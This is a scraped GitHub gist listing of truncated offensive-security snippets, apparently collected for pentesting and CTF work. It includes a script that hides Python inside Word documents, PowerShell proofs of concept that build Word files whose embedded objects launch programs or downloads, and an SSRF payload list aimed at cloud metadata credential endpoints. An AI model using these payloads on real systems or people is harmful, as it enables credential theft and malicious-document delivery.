Skip to content

Instantly share code, notes, and snippets.

View Malayke's full-sized avatar

Malayke

  • planet Earth (Solar System)
View GitHub Profile
@hakluke
hakluke / dumpCN.py
Last active September 18, 2022 10:52
#!/usr/bin/python3
import ssl,sys,json
cert = ssl.get_server_certificate((sys.argv[1], 443)) #Retrieve SSL server certificate
cert = ssl.PEM_cert_to_DER_cert(cert) #Convert certificate to DER format
begin = cert.rfind(b'\x06\x03\x55\x04\x03') + 7 #Find the last occurence of this byte string indicating the CN, add 7 bytes to startpoint to account for length of byte string and padding
end = begin + cert[begin - 1] #Set endpoint to startpoint + the length of the CN
jsondata = {"ip": sys.argv[1], "cn": cert[begin:end].decode('utf-8')}
print(json.dumps(jsondata))
@keyboardcrunch
keyboardcrunch / pydocexec.py
Created April 30, 2020 02:24
Injects a python script inside a word document so the doc can be executed with python :)
#!/usr/bin/python3
import sys
import os
import zipfile
import tempfile
from xml.etree import ElementTree
from shutil import copyfile
def stuffer(py_file, doc_file):
@arbazkiraak
arbazkiraak / send_urls_to_burp
Created February 20, 2020 12:03
Send Urls to Burp
#!/usr/bin/python3
import requests,sys
import urllib3,queue,threading
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'}
proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}
urls_inp = sys.argv[1]
Function Trim-WorkingSet {
[cmdletbinding()]
param([int] $procid)
begin {
$sig = @"
[DllImport("kernel32.dll")]
public static extern bool SetProcessWorkingSetSize( IntPtr proc, int min, int max );
"@
}
@securifybv
securifybv / Forms.HTML.ps1
Last active September 10, 2021 09:48
PowerShell script that creates a Word document with an embedded Forms.HTML:Image.1 object that when clicked will cause Calculator to be opened. See also: https://securify.nl/blog/SFY20180801/click-me-if-you-can_-office-social-engineering-with-embedded-objects.html
# target file path
$filename = [Environment]::GetFolderPath('Desktop') + '\Forms.HTML.docx'
$progid = 'Forms.HTML:Image.1'
$clsid = '5512D112-5CC6-11CF-8D67-00AA00BDCE1D'
$html = '<x type="image" src="https://securify.nl/blog/SFY20180801/packager.emf" action="file:///c|/windows/system32/calc.exe">'
# load assemblies for changing the docx (zip) file
[void] [Reflection.Assembly]::LoadWithPartialName('System.IO.Compression.FileSystem')
[void] [Reflection.Assembly]::LoadWithPartialName('System.IO.Compression')
@securifybv
securifybv / Shell.Explorer open file.ps1
Last active April 8, 2023 06:46
PowerShell script that creates a Word document containing an embedded Internet Explorer object. It uses Packager to create an object that looks like an embedded file, clicking the object will trigger a file download. See also: https://securify.nl/blog/SFY20180801/click-me-if-you-can_-office-social-engineering-with-embedded-objects.html
# target file path
$filename = [Environment]::GetFolderPath('Desktop') + '\WebBrowser.docx'
# path to open
#$path = 'c:\windows\system32\calc.exe'
$path = 'https://securify.nl/blog/SFY20180801/thisisfine.url'
# the temp file is used for creating the icon
$tmpfile = "$env:TEMP\Totally Safe.txt"
@AvasDream
AvasDream / htb.md
Last active September 18, 2024 18:26
Cheatsheet for HackTheBox

Purpose

Cheatsheet for HackTheBox with common things to do while solving these CTF challenges.

Because a smart man once said:

Never google twice.

Linux General

@jhaddix
jhaddix / cloud_metadata.txt
Last active August 20, 2024 19:23 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
After a little more research, 'In Memory' notion was a little exaggerated (hence the quotes). However, we'll call it 'In Memory Inspired' ;-)
These examples are PowerShell alternatives to MSBuild.exe/CSC.exe for building (and launching) C# programs.
Basic gist after running PS script statements:
- Loads C# project from file or web URL
- Create various tmp files
- Compile with csc.exe [e.g. "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\subadmin\AppData\Local\Temp\lz2er5kc.cmdline"]
- Comvert to COFF [e.g. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\subadmin\AppData\Local\Temp\RES11D5.tmp" "c:\Users\subadmin\AppData\Local\Temp\CSCDECDA670512E403CA28C9512DAE1AB3.TMP"]
@milo2012
milo2012 / getMoreDomains.py
Last active July 10, 2019 14:01
Get Domains Belonging to Organization from securitytrails.com
import requests
import json
import pprint
import sys
import dns.message
import dns.query
import dns.rdatatype
import dns.resolver
import dns.reversename
import time